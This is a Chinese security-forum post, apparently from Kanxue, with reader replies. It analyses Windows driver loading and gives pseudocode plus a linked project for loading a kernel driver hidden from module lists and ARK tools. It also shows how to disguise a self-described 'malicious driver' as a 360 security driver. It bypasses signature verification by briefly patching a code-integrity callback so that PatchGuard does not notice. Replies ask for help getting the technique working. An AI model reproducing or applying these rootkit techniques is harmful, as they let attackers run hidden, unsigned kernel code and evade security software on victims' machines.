首页
社区
课程
招聘
“可过PG”的驱动伪装与隐藏
2023-4-19 01:07 27205

“可过PG”的驱动伪装与隐藏

2023-4-19 01:07
27205

“可过PG”的驱动伪装与隐藏

潜水太久啦,来水个帖。

1 驱动是如何加载的

1.1 调用路径分析

非常简单,手写个驱动,在DriverEntry上加上一句:

1
DbgBreakPoint();

手动加载,调用栈如下:

 

 

发现华点:

1
ExpWorkerThread -> IopLoadUnloadDriver -> IopLoadDriver -> DriverEntry

IopLoadDriver基本上只有第一个参数没确定意义了。

 

 

使用IDA对IopLoadUnloadDriver进行引用分析。来自IopLoadDriverImage

 

 

再对IopLoadDriverImage引用分析。来自NtLoadDriver

 

 

这唯一的一个参数,就是注册表对应的服务路径啦,例:

 

\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Test_Drv

 

 

这个注册表是在你 Ring3 调用 CreateServiceW的时候就填好的。

 

那么调用路径就清晰啦:

1
添加注册项 -> NtLoadDriver -> IopLoadDriverImage -> IopLoadUnloadDriver -> IopLoadDriver -> DriverEntry

1.2 IopLoadDriver

这个函数是基本算是最重要的函数啦,毕竟是它调用的DriverEntry。

 

而分析上述调用路径的唯一作用,就是为了得到 IopLoadDriver参数的意义。(注册表的 Handle)

 

由于这个函数比较大,仅分析重要部分,伪代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
//获取注册表项基本信息
status = NtQueryKey(KeyHandle, KeyBasicInformation, P, Length, &Length);
 
//从注册表键中获取驱动路径 放入 Destination
//例:\??\C:\Users\nihao\Desktop\Kernel_PDB_Frame_R0.sys
status = IopBuildFullDriverPath(&v38, KeyHandle, &Destination);
 
//这个函数非常重要!返回DriverObject.DriverSection 和 驱动基地址 BaseAddress
//通过这个函数就能直接安装一个可运行的驱动了,待会分析
status = MmLoadSystemImageEx(&Destination, 0, 0, 0, &DriverSection, &BaseAddress);
 
//创建一个新的DriverObject
OBJECT_ATTRIBUTES Obj_Att = { 0 };
Obj_Att.Length = 0x30;
Obj_Att.Attributes = 0x250;
Obj_Att.ObjectName = &ObjectName;// L"\\Driver\\Test_Drv" "\\Driver\\"串接 服务名
status = ObCreateObjectEx(KeGetCurrentThread()->PreviousMode,
                              IoDriverObjectType,
                             &Obj_Att,// POBJECT_ATTRIBUTES
                             0,
                             &out,//这个是一个ULONG64 类型 没啥用
                             0x1A0,
                             0,
                             0,
                             &DriverObject,//返回新的 DriverObject
                             0i64);
 
 
//填充DriverObject
memset(DriverObject, 0, 0x1A0ui64);
DriverObject->DriverExtension = &DriverObject[1];// 准备填充 Driver_Object
*&DriverObject[1].Type = DriverObject;
ReturnLength = 28;
memset64(DriverObject->MajorFunction, IopInvalidDeviceRequest, 0x1Cui64);
v18 = BaseAddress;//MmLoadSystemImageEx返回的基地址
v19 = BaseAddress;
*&DriverObject->Type = 0x1500004; // Type = 4,Size = 0x150
v20 = RtlImageNtHeader(v19);
*v40 = v20->OptionalHeader.MinorImageVersion | (v20->OptionalHeader.MajorImageVersion << 16);
v21 = &v18[v20->OptionalHeader.AddressOfEntryPoint];
if ( (v20->OptionalHeader.DllCharacteristics & 0x2000) == 0 )
    DriverObject->Flags |= 2u;
DriverObject->DriverInit = v21;//DriverEntry 啦
DriverObject->DriverSection = DriverSection;//MmLoadSystemImageEx 返回的DriverSection
DriverObject->DriverStart = v18;//基地址
DriverObject->DriverSize = v20->OptionalHeader.SizeOfImage;
 
//将DriverObject添加入全局Object
status = ObInsertObjectEx(DriverObject, 0i64, 1i64, 0, 0, 0i64, &Handle);// 加入Object
 
//继续填充DriverObject
status = ObReferenceObjectByHandle(Handle,0,IoDriverObjectType,
                        KeGetCurrentThread()->PreviousMode,
                        &DriverObject,
                        0i64);//测试一下能不能通过Handle获得DriverObject ?!
ZwClose(Handle);
DriverObject->HardwareDatabase = PCmRegistryMachineHardwareDescriptionSystemName;
DriverObject->DriverName.Buffer = ExAllocatePool(NonPagedPool, ObjectName.MaximumLength);
DriverObject->DriverName.Length = ObjectName.Length;
DriverObject->DriverName.MaximumLength = ObjectName.MaximumLength;
memcpy(DriverObject->DriverName.Buffer, ObjectName.Buffer, ObjectName.MaximumLength);
//这里的 ObjectName 就是 L"\\Driver\\Test_Drv"  "\\Driver\\"串接 服务名
 
//调用DriverEntry
status = ZwQueryObject(HRegistry, 1, PSTR, 0x1000, &NtQueryObjReturnLen);//拿到注册表路径
DriverObject->DriverInit(DriverObject,PSTR);//刚好对应DriverEntry的两个参数
 
//提交驱动申请的设备(如果驱动有注册设备)
IopReadyDeviceObjects(DriverObject);//不调用这个函数的话,设备无法打开
 
//收尾工作

1.3 MmLoadSystemImageEx

这个函数非常强大,传入需要加载的驱动的路径,就可以直接加载一个可直接运行的无DriverObject驱动。(请读者自行测试)

 

功能包括:

 

创建DriverSection、映射内存、修复重定位、将DriverSection添加入PsLoadedModuleList、填充IAT、填充_security_cookie、...(这几个功能已经够用了)

 

没错,上述的 DriverSection 就是 驱动模块链表 连接的结构体 :_LDR_DATA_TABLE_ENTRY。

 

同样,这个函数比较大,这里仅列出重要部分伪代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
//准备一下接下来需要用到的字符串
status = MiGenerateSystemImageNames(DriverPath, zero1, zero2, &v69, v73, &String1);
//string1同DriverPath \??\C:\Users\nihao\Desktop\Kernel_PDB_Frame_R0.sys
 
//创建DriverSection (仅创建、不插入PsLoadedModuleList)
status = MiObtainSectionForDriver(&String1, DriverPath, 0, 0, &DriverSection);
 
//申请映射地址
PUCHAR Section = DriverSection + 0x70;
int out_uk;
DllBase = MiGetSystemAddressForImage(Section, 0, &out_uk);//此时还未映射
 
//进行映射
KIRQL OldIrql;
KeRaiseIrql(1, &OldIrql);
status = MiMapSystemImage(Section, DllBase);//一定要是 irql = 1 才能映射成功
KeLowerIrql(OldIrql);//映射好的驱动是已经修好了重定位的了,非常nice
 
//填充DriverSection信息并插入PsLoadedModuleList
DriverSection->SizeOfImage = DllSize;
DriverSection->DllBase = DllBase;
status = MiConstructLoaderEntry(DriverSection, &OutU, &AString, 0, 1, &NewDriverSection);
//此时可以Free旧的DriverSection,新的 NewDriverSection 才是真正有效的。
// &OutU和&AString都是没用的输出值,不用管,给个空间就行了
 
//修复IAT
 
//填充_security_cookie

至此,一个 可在驱动模块链表(PsLoadedModuleList)可以找到的驱动就加载完成了。

1.3.1 数字签名验证部分

如果你需要隐藏或伪装的驱动本身有签名,就不用patch了,如果硬要加载一个无签名的,那才需要patch,最好不要啦,因为有蓝屏几率。

 

在通过MiObtainSectionForDriver获取DriverSection的时候,Windows就会进行数字签名认证啦!调用栈如下:

 

 

通过 SeValidateImageHeader进入 CI.DLL 进行签名校验,CL.DLL 部分就不再继续跟了,我们主要看如何进入CI.DLL:

 

 

网上一般通过Patch CI!g_CiOptions实现绕过数字签名校验,这边就不搞这么复杂了,我们 patch qword_14040EF40,换成我们的函数,返回 STATUS_SUCCESS 就可以通过签名校验了,虽然 qword_14040EF40受PG保护,但是只修改一会,加载完驱动就改回去,PG就反应不过来了。(我试过很多次,基本上改了 qword_14040EF40 后几个小时PG才能反应过来)。定位:

 

 

win10、win11 我都看过, 都是在 &SeCiCallbacks + 0x20 的位置,可能有些版本不同。

2 开始操作

操作很简单,通过调用上面说到过的未导出函数,就能实现。

 

需要隐藏的驱动或伪装的驱动代码如下:(主要是创建一个 名为 ICEY_Device的设备,创建成功说明 驱动加载成功)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include<ntddk.h>
#define my_device_name  L"\\Device\\ICEY_Device"//设备名
#define my_link_name L"\\??\\ICEY_Device"//符号链接名
 
NTSTATUS Exit(DRIVER_OBJECT* DriverObject) {
    UNICODE_STRING symbolLinkName;
    if (DriverObject->DeviceObject)
        IoDeleteDevice(DriverObject->DeviceObject);
    RtlInitUnicodeString(&symbolLinkName, my_link_name);
    IoDeleteSymbolicLink(&symbolLinkName);
    return STATUS_SUCCESS;
}
 
NTSTATUS Test(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    NTSTATUS Status;
    DbgPrint("Create File Finsh!\n");//输出成功,则代表成功
    Status = STATUS_SUCCESS;
    pIrp->IoStatus.Status = Status;
    pIrp->IoStatus.Information = 0;
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}
 
NTSTATUS DriverEntry(PDRIVER_OBJECT DrvObj, PUNICODE_STRING Str) {
    UNICODE_STRING device_name, device_link_name, event_name1, event_name2;//设备名,符号链接名,事件名
    RtlInitUnicodeString(&device_name, my_device_name);//初始化设备名
    RtlInitUnicodeString(&device_link_name, my_link_name);//初始化符号链接名
    NTSTATUS status = 0;
    PDEVICE_OBJECT ShellDevObj = NULL;
    status = IoCreateDevice(DrvObj, 200, &device_name, FILE_DEVICE_UNKNOWN, 0, 1, &ShellDevObj);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("无法创建设备!\n");
        return status;
    }
    status = IoCreateSymbolicLink(&device_link_name, &device_name);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("无法创建符号链接!\n");
        IoDeleteDevice(ShellDevObj);
        return status;
    }
    DrvObj->MajorFunction[IRP_MJ_CREATE] = Test;
    return status;
}

编译出来的 驱动文件 名字为 : Test_Drv.sys

2.1 驱动隐藏加载

这里就贴一下伪代码,实际代码请查看项目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#define HideDrvPath L"\\??\\C:\\Users\\nihao\\Desktop\\xixi.sys" //填驱动路径
 
UNICODE_STRING Path;
RtlInitUnicodeString(&Path, HideDrvPath);
 
//Patch 签名校验   可省略,看你需要加载的驱动是否有签名
CIFun = *Pqword_14040EF40;
*Pqword_14040EF40 = MySeValidateImageHeader;//换成我们的函数,这个函数返回 STATUS_SUCCESS
 
//获取DriverSection
MiGenerateSystemImageNames(&Path, 0, 0, &Out, Out14, &String1);
MiObtainSectionForDriver(&String1, &Path, 0, 0, &PDriverSection);
 
//恢复patch    可省略,看你需要加载的驱动是否有签名
*Pqword_14040EF40 = CIFun;
 
//映射内存
Section = PDriverSection + 0x70;
DllBase = MiGetSystemAddressForImage(Section, 0, &un);
MiMapSystemImage(Section, DllBase);
ExFreePool(PDriverSection);
 
//填充IAT
略,请看项目完整代码;
 
//填充_security_cookie
略,请看项目完整代码;
 
//修复 WDF(可选)
略,这一部分是因为 WDF的驱动 DriverEntry 内有一些特殊操作,不修复就会蓝屏,WDM驱动就没有这个问题;
 
//调用DriverEntry
略,请看项目完整代码;

对就这么简单,就加载了一个隐藏驱动(无DriverObject 、无DriverSection)

 

由于没有这两个结构体,所以这个驱动一些函数是无法调用的,如何解决这里不赘述了。

 

在项目中我采取了IO劫持的方式,让我的隐藏驱动创建设备,原理就是给隐藏驱动的 DriverEntry第一个参数传进一个没有设备的DriverObject,详情请看代码。

2.1.1 测试:
 

 

ARK工具找不到:

 

 

WinObj 双击 设备名字测试:(成功输出 “Create File Finsh!”)

 

2.2 驱动伪装加载

同上,只贴伪代码,实际代码请查看项目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#define ADrvPath L"\\??\\C:\\Users\\nihao\\Desktop\\test\\Test_Drv.sys" //恶意驱动路径
#define ODrvPath L"\\??\\C:\\Users\\nihao\\Desktop\\test\\360AntiHacker64.sys"//傀儡驱动路径
#define ServiceName  L"AntiHacker"//傀儡服务名
 
//将 恶意驱动 伪装成 傀儡驱动
 
//自建注册表服务,以 ServiceName 命名
略,详情请看代码;
 
//Patch 签名校验   可省略,看你需要加载的驱动是否有签名
CIFun = *Pqword_14040EF40;
*Pqword_14040EF40 = MySeValidateImageHeader;//换成我们的函数,这个函数返回 STATUS_SUCCESS
 
//获取 恶意驱动的 DriverSection 和 傀儡驱动的 DriverSection
status = MiObtainSectionForDriver(&AString, &ADrvPathUn, 0, 0, &PADriverSection);
status = MiObtainSectionForDriver(&OString, &ODrvPathUn, 0, 0, &PODriverSection);
 
//对恶意驱动 进行映射
Section = *(PULONG64)(PADriverSection + SectionOffset);
DllBase = MiGetSystemAddressForImage(Section, 0, &un);
status = MiMapSystemImage(Section, DllBase);
Head = RtlImageNtHeader(DllBase);
DllSize = *(PULONG32)(Head + 0x50);
 
//恢复patch    可省略,看你需要加载的驱动是否有签名
*Pqword_14040EF40 = CIFun;
 
//将恶意驱动信息填入 傀儡驱动DriverSection 并提交(加入PsLoadedModuleList链表)
PODriverSection->SizeOfImage = DllSize;
PODriverSection->DllBase = DllBase;
status = MiConstructLoaderEntry(PODriverSection, &OutU, &OString, 0, 1, &NewPODriverSection);
 
//修复IAT
略;
 
//修复_security_cookie
略;
 
//修复 WDF(可选)
略,这一部分是因为 WDF的驱动 DriverEntry 内有一些特殊操作,不修复就会蓝屏,WDM驱动就没有这个问题;
 
//构造 DriverObject ,并填入信息(恶意驱动的信息) ,然后 加入 全局Object
status = ObCreateObjectEx(0, *PIoDriverObjectType, &att, 0, &Out, 0x1A0, 0, 0, &PTDrvObj, 0);
memset(PTDrvObj, 0, 0x1a0);
PTDrvObj->DriverExtension = &PTDrvObj[1];
*(PULONG64)(&PTDrvObj[1]) = &PTDrvObj[0];
for (int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) {
    PTDrvObj->MajorFunction[i] = PIopInvalidDeviceRequest;
}
PTDrvObj->Type = 4; PTDrvObj->Size = 0x150;
PTDrvObj->DriverInit = NewPODriverSection->EntryPoint;
PTDrvObj->DriverSection = NewPODriverSection;
PTDrvObj->DriverStart = DllBase;
PTDrvObj->DriverSize = DllSize;
PTDrvObj->Flags |= 2;
status = ObInsertObjectEx(PTDrvObj, 0, 1, 0, 0, 0, &DrvH);
status = ObReferenceObjectByHandle(DrvH, 0, *PIoDriverObjectType, 0, &PTDrvObj, NULL);
ZwClose(DrvH);
PTDrvObj->HardwareDatabase = PCmRegistryMachineHardwareDescriptionSystemName;
PTDrvObj->DriverName.Buffer = ExAllocatePool(NonPagedPool, ObjectName.MaximumLength);
PTDrvObj->DriverName.Length = ObjectName.Length;
PTDrvObj->DriverName.MaximumLength = ObjectName.MaximumLength;
memcpy(PTDrvObj->DriverName.Buffer, ObjectName.Buffer, ObjectName.MaximumLength);
//ObjectName 是 "\\Driver\\XXX"
 
//调用DriverEntry
status = ZwQueryObject(HRegistry, 1, PSTR, 0x1000, &NtQueryObjReturnLen);
PTDrvObj->DriverInit(PTDrvObj,PSTR);
 
//提交设备
IopReadyDeviceObjects(PTDrvObj);
2.2.1 测试:
 

将 Test_Drv.sys 伪装成 360AntiHacker64.sys 。

 

ARK签名检测:

 

 

火绒剑检测:

 

3 项目地址 & 补充说明

不保证100%可过 PG,只是在我测试 40+小时以上,win10 win11 均未被PG检测。

 

项目用到大量未导出函数,需要自己想办法获取函数地址。进入 Kernel_PDB.c InitAllOffSet() 进行修改

 

管安装不管卸载,重启即可卸载哈哈哈哈。

项目地址:

Drv_Hide_And_Camouflage


[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

最后于 2023-4-26 11:22 被icey_编辑 ,原因:
收藏
点赞15
打赏
分享
最新回复 (22)
雪    币: 6294
活跃值: (3452)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
nekaxi 2023-4-19 07:10
2
0
PG是什么意思?
雪    币: 9526
活跃值: (4428)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
lononan 2023-4-19 07:29
3
0
nekaxi PG是什么意思?
屁股
雪    币: 187
活跃值: (833)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
crackcc 2023-4-19 09:04
4
0
没看出来跟屁股的关系
雪    币: 19539
活跃值: (29224)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
秋狝 2023-4-19 09:06
5
1
tql
雪    币: 1226
活跃值: (1605)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
烟花易冷丶 2023-4-19 09:11
6
0
国外17年玩过了...
雪    币: 10223
活跃值: (2245)
能力值: ( LV5,RANK:71 )
在线值:
发帖
回帖
粉丝
joker陈 2023-4-19 09:22
7
0

干货满满,感谢分享

最后于 2023-4-19 09:23 被joker陈编辑 ,原因:
雪    币: 1524
活跃值: (3300)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
小希希 2023-4-19 11:01
8
0
感谢分享
雪    币: 6294
活跃值: (3452)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
nekaxi 2023-4-20 06:03
9
0
lononan 屁股
雪    币: 0
活跃值: (226)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
wx_kx21839 2023-4-23 21:20
10
0
和 kdmapper区别是什么
雪    币: 168
活跃值: (45)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
qqxiaobing 2023-5-19 12:42
11
0
大佬,我在使用MiGetSystemAddressForImage映射后,dllbase的地址错误,全是??。这是为什么
雪    币: 1246
活跃值: (1943)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
icey_ 1 2023-5-19 13:09
12
0
mb_jglkxfsm 大佬,我在使用MiGetSystemAddressForImage映射后,dllbase的地址错误,全是??。这是为什么
MiGetSystemAddressForImage只是向系统申请一个空间,它返回一个地址,还没映射。把返回的地址通过MiMapSystemImage映射,才有内容。
雪    币: 168
活跃值: (45)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
qqxiaobing 2023-5-19 17:12
13
0

在填充IAT过程中,如果我直接不下段F11进去单步步过就会报错,单步步过可以通过,但是之后再修复WDF这里  申请内存的时候又会报错,求解,大佬

雪    币: 15
活跃值: (105)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Prompto 2023-5-19 22:31
14
0
想问一个很小白的问题,有不触发PG的进程隐藏源码吗?
雪    币: 411
活跃值: (1170)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
foxkinglxq 2023-5-20 18:10
15
0
lononan 屁股
你牛 哈哈
雪    币: 30
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
搬山填海 2023-5-22 08:59
16
0
竟然没看懂
雪    币: 1524
活跃值: (3300)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
小希希 2023-5-27 22:39
17
0
学习,感谢分享
雪    币: 220
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
mb_goyzgaws 2023-6-6 02:41
18
0
qqxiaobing 在填充IAT过程中,如果我直接不下段F11进去单步步过就会报错,单步步过可以通过,但是之后再修复WDF这里&nbsp; 申请内存的时候又会报错,求解,大佬
我给你看看
雪    币: 0
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
编程与少年 2023-7-19 22:11
19
0
Prompto 想问一个很小白的问题,有不触发PG的进程隐藏源码吗?
隐藏进程可以不pg的
雪    币: 1484
活跃值: (1135)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
冰雄 2023-7-27 14:56
20
0
楼主试过能过 大黄蜂等翻录软件的驱动隐藏进程的检测吗?
雪    币: 0
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
z张大侠 2023-7-30 21:11
21
0

PTDrvObj->DriverExtension = &PTDrvObj[1];
*(PULONG64)(&PTDrvObj[1]) = &PTDrvObj[0];这是两步是做什么的啊,&PTDrvObj[1]这样不就是 pObj+sizeof(obj) ObCreateObjectEx返回的obj地址是连续的吗?

最后于 2023-7-30 21:13 被z张大侠编辑 ,原因:
雪    币: 207
活跃值: (134)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
板子菌 2023-11-7 19:47
22
0
问一个小白的问题,CI.DLL那里,楼主是怎么知道qword_1403A5C60这个变量是代表进入CI.DL里的函数的呢?我在IDA中对这个变量查询引用,发现没有地方初始化它
雪    币: 207
活跃值: (134)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
板子菌 2023-11-9 11:27
23
0
qqxiaobing 在填充IAT过程中,如果我直接不下段F11进去单步步过就会报错,单步步过可以通过,但是之后再修复WDF这里&nbsp; 申请内存的时候又会报错,求解,大佬
解决了吗?我也是MakeIAT这里报错,在里面的MiSnapThunk报了分页错误,提示访问了只读内存
游客
登录 | 注册 方可回帖
返回